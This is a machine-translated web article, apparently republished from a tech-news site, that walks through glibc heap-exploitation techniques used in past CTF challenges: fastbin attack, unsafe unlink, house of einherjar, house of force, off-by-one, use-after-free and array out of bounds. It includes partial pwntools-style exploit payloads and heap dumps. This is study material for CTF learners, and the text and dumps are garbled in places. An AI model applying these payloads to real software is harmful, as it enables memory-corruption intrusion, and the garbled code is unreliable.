Shulou(Shulou.com)06/02 Report--

CTF PWN heap overflow example analysis, I believe that many inexperienced people do not know what to do, so this article summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

Knowledge point

The use of fastbin, single linked list connection characteristics, overflow to modify the address of the next free chunk, resulting in any address to write.

Example: 0CTF 2017 Babyheap

Fill function can fill arbitrary long bytes, the loophole is here.

Leak memory: libc address

Modify _ _ malloc_hook content is one_gadget

Getshell

Key point: fastbin attack

First Step

Alloc (0x60) alloc (0x40) 0x56144ab7e000: 0x0000000000000000 0x0000000000000071-> chunk0 header0x56144ab7e010: 0x0000000000000000 0x00000000000000000x56144ab7e020: 0x0000000000000000 0x00000000000000000x56144ab7e030: 0x0000000000000000 0x00000000000000000x56144ab7e040: 0x0000000000000000 0x00000000000000000x56144ab7e050: 0x0000000000000000 0x00000000000000000x56144ab7e060: 0x0000000000000000 0x00000000000000000x56144ab7e070: 0x0000000000000000 0x0000000000000051-> chunk1 header0x56144ab7e080: 0x0000000000000000 0x00000000000000000x56144ab7e090: 0x0000000000000000 0x0000000000000000

Second Step

Fill (0x10, 0x60 + 0x10, "A" * 0x60 + p64 (0) + p64 (0x71))-- > start destroying chunk1 header0x56144ab7e000: 0x0000000000000000 0x00000000000000710x56144ab7e010: 0x6161616161616161 0x61616161616161610x56144ab7e020: 0x61616161616161610 x61616161616161610x56144ab7e030: 0x6161616161616161 0x61616161616161610x56144ab7e040: 0x6161616161616161 0x61616161616161610x56144ab7e050: 0x6161616161616161 0x61616161616161610x56144ab7e060: 0x6161616161616161 0x61616161616161610x56144ab7e070: 0x0000000000000000 0x0000000000000071-- > has been modified to 0x710x56144ab7e080: 0x0000000000000000 0x0000000000000000

Third Step: apply for small chunk

0x56144ab7e060: 0x6161616161616161 0x61616161616161610x56144ab7e070: 0x0000000000000000 0x00000000000000710x56144ab7e080: 0x0000000000000000 0x00000000000000000x56144ab7e090: 0x00000000000000000x 00000000000000000x56144ab7e0a0: 0x0000000000000000 0x00000000000000000x56144ab7e0b0: 0x0000000000000000 0x00000000000000000x56144ab7e0c0: 0x0000000000000000 0x0000000000000111-- > chunk2 header

Fouth Step: destroy chunk2 header, with the ultimate goal of releasing chunk2

Fill (2, 0x20,'c'* 0x10 + p64 (0) + p64 (0x71))-- > fake chunk headerFree (1) Alloc (0x60) 0x56144ab7e000: 0x0000000000000000 0x0000000000000071.0x56144ab7e060: 0x6161616161616161 0x61616161616161610x56144ab7e070: 0x0000000000000000 0x0000000000000071.0x56144ab7e0e0: 0x0000000000000000 0x0000000000000071-- > fake chunk header

Fifth Step: repairing chunk2 header, free

Fill (1, 0x40 + 0x10,'b' * 0x60 + p64 (0) + p64 (0x111))-- > repair chunk2Free (2) Dump (1) 0x56144ab7e060: 0x6161616161616161 0x61616161616161610x56144ab7e070: 0x0000000000000000 0x00000000000000710x56144ab7e080: 0x6262626262626262 0x62626262626262620x56144ab7e090: 0x6262626262626262 0x6262626262626262.0x56144ab7e0c0: 0x0000000000000000 0x00000000000001110x56144ab7e0d0: 0x00007f26abbacb78 0x00007f26abbacb78-- > point to an address in libc (the program uses write to print all the content, no\ x00 cutoff) 0x56144ab7e0e0: 0x0000000000000000 0x0000000000000071

Sixth Step: change the next free chunk to _ _ malloc_hook

Free (1) payload ='a'* 0x60 + p64 (0) + p64 (0x71) + p64 (malloc_hook-27-0x8) + p64 (0) # fake chunk + modified address Fill (0, 0x60 + 0x10 + 0x10, payload)

Detailed explanation and analysis

File download

Section II (fastbin_dup_consolidate)

Knowledge point

When the topchunk size is not enough to meet the size of the application, the free chunk of fastbin will be merged. If insufficient: the main distribution area calls sbrk to increase the top chunk size, and the non-primary distribution area calls mmap to allocate a new sub-heap.

The real address of the function is stored in the got table. The function call looks up the function address in the got table and then jumps. Modify the address of the corresponding function in the got table to achieve the purpose of getshell.

Double free: release memory twice, can be matched with Unlink to achieve any address read and write.

Chestnut: HITCON CTF 2016 SleepyHolder

Program analysis

You can choose to apply for 40, 4000, 400000 heaps of three different sizes, each of which can only apply for one. 400000 will empty the fastbin. Delete: modify the corresponding flag position bit 0 without checking whether the corresponding pointer has been released, resulting in Double Free.

Highlight

Demo process:

Apply for small secret and big secret

Delete small secret

Apply for large secret

Before applying for large secret

After that

Detailed analysis

File download

Section III (unsafe_unlink)

Knowledge point

Unlink: when freer two adjacent small chunk, the merge feature will occur to attack. The merged chunk block is placed in the bidirectional linked list to form the unsorted bin.

Chestnut: HITCON CTF 2014 stkof

Program analysis

Alloc: enter the size of the allocated memory

Read_in: write to any length. This is the vulnerability.

Free:useless

Highlight

Bypass size check bypass pointer check

Bypass size

If (_ _ builtin_expect (chunksize (P)! = prev_size (next_chunk (P)), 0))\ malloc_printerr ("corrupted size vs. Prev_size")

Sort out the process.

> P=0x1307540, chunksize (P) = 0x20 > nextchunk (P) = 0x1307540 + 0x20 = 0x1307540 + 0x20 > prev_size = [0x1307540 + 0x20] = 0x20 > 0x20 = 0x20, bypass is fake_chunk, easy to bypass.

Bypass pointer check

If (_ _ builtin_expect (FD- > bk! = P | | BK- > fd! = P, 0))\ malloc_printerr ("corrupted double-linked list");\

Sort out the process.

> FD = [0x1307540 + 0x10] = 0x602138, > BK = [0x1307540 + 0x18] = 0x602140 > FD- > bk = [0x602138 + 0x18] = 0x1307540, > BK- > fd = [0x602140 + 0x10] = 0x1307540 > P = 0x1307540 > FD- > bk! = P is false > BK- > fd! = P is false > successful bypass

Detailed analysis

File download

Section IV (house_of_einherjar)

Knowledge point

House_of_einherjar: this pair uses the technology to force malloc to return an chunk with almost any address, mainly due to the abuse of backward merging in free.

Chestnut: Seccon CTF 2016 tinypad

Program analysis

Add memo

Delete memo: the pointer is released and the size bit is cleared, but the corresponding pointer is not cleared.

Edit memo: there is an Off_By_One vulnerability.

Quit

Highlight

Modify the pointer of unsorted bin by using Off_By_One and unlink

1. Leak

Add (0x80, "A" * 0x80) add (0x80, "B" * 0x80) add (0x80, "C" * 0x80) add (0x80, "D" * 0x80) delete (3) delete (1)

2. House_of_einherjar

Add (0x18, "A" * 0x18) add (0x100, "B" * 0xf8 + p64 (0x11)) add (0x100, "C" * 0x100) add (0x100, "D" * 0x100) tinypad = 0x602040offset = heap + 0x20-0x602040-0x20fake_chunk = p64 (0) + p64 (0x101) + p64 (0x602060) * 2edit (3) "D" * 0x20 + fake_chunk) zero_byte_number = 8-len (p64 (offset) .strip ("\ x00"))''loop edit because stcpy () stops copy because of empty subsections, but each read changes the last byte to NULL, so it can be overwritten one by one with NULL Make the prev_size of No.2 chunk offset'''for i in range (zero_byte_number+1): data = "A" * 0x10 + p64 (offset) .strip ("\ x00"). Rjust (8muri,'f') edit (1, data) delete (2) edit (4, "D" * 0x20 + p64 (0) + p64 (0x101) + p64 (main_arena + 0x58) * 2) # repair unsorted bin

Detailed analysis

File download

Section 5 (house_of_force)

Knowledge point

House_of_force: overflow top chunk and return any address.

Top chunk: when the bins and fastbin cannot meet the requested size, the corresponding size will be split from the top chunk to the user. For example, in the first malloc, there is no corresponding free chunk in fastbin and bins, so it will be allocated from top chunk.

Chestnut: BCTF 2016 bcloud

Program analysis

Welcome: enter name, host, org. The loophole is that a certain input is constructed, which enables the program to copy excessive data to the corresponding heap space, and the top chunk size can be modified.

New Note: malloc

Show Note: display

Edit Note: update

Delete: free

Highlight

Name = "Bill" * 0x10org = "A" * 0x40host = p32 (0xffffffff) welcome (name, org, host)

Front

After

Reason

Detailed analysis

File download

Section VI (off_by_one)

Knowledge point

Off_By_One: it means that we can write an extra byte, do not underestimate this byte, and sometimes modify the state of chunk header.

Chestnut: Asis CTF 2016 b00ks

Program analysis

Welcome: enter an author name, where there is an Off_By_One vulnerability that overflows an empty section.

Create a book: create a book

Delete

Edit a book

Print book detail

Change current author name (another editor gives us a chance to modify the book pointer) Exit

Loophole location

The first impact: information disclosure

The second effect: the heap address will be modified

Idea: a fake chunk is arranged in the modified heap address, and any address can be modified.

Detailed analysis

Detailed explanation of documents

Section 7 (UAF)

Knowledge point

Use After Free: after the memory is freed, its corresponding pointer is not set to NULL, re-use may cause the program to crash. Realloc: re-modify the allocation space, the source code can be downloaded in the file download link, this source code is not very long.

The application is larger than the original, release the original pointer and reapply for memory.

The application is smaller than the original, return to the original pointer.

Chestnut: CISCN CTF 2018 task_supermarket

Program analysis

Struct node {char name [16]; int price; int size; char* des;} commodity [15]

Add

Delete

List

Change price

Change description: here is the loophole. When we apply for a heap larger than the original heap, the program does not update the des pointer in the original structure. If we apply for a node [1] again at this time, and the node [1] happens to fall in the des area of node [0], we can control the node [1] by editing the des of node [0].

Thought verification

Detailed analysis

File download

Section 8 (array out of bounds)

Knowledge point

Array out of bounds: that is, the program does not verify the positive or negative of index, so it may be overwritten forward. For example: char * s = "hello,world"; try s [- 1]

Chestnut: CISCN 2018 task_note_service

Program analysis

Add note: there is no positive or negative judgment on the input index, which causes the array to cross the bounds.

Show note

Edit note

Delete note

Train of thought

Change the value of free@got to the address of shellcode.

Before modification

After modification

After reading the above, have you mastered the method of example analysis of CTF PWN heap overflow? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.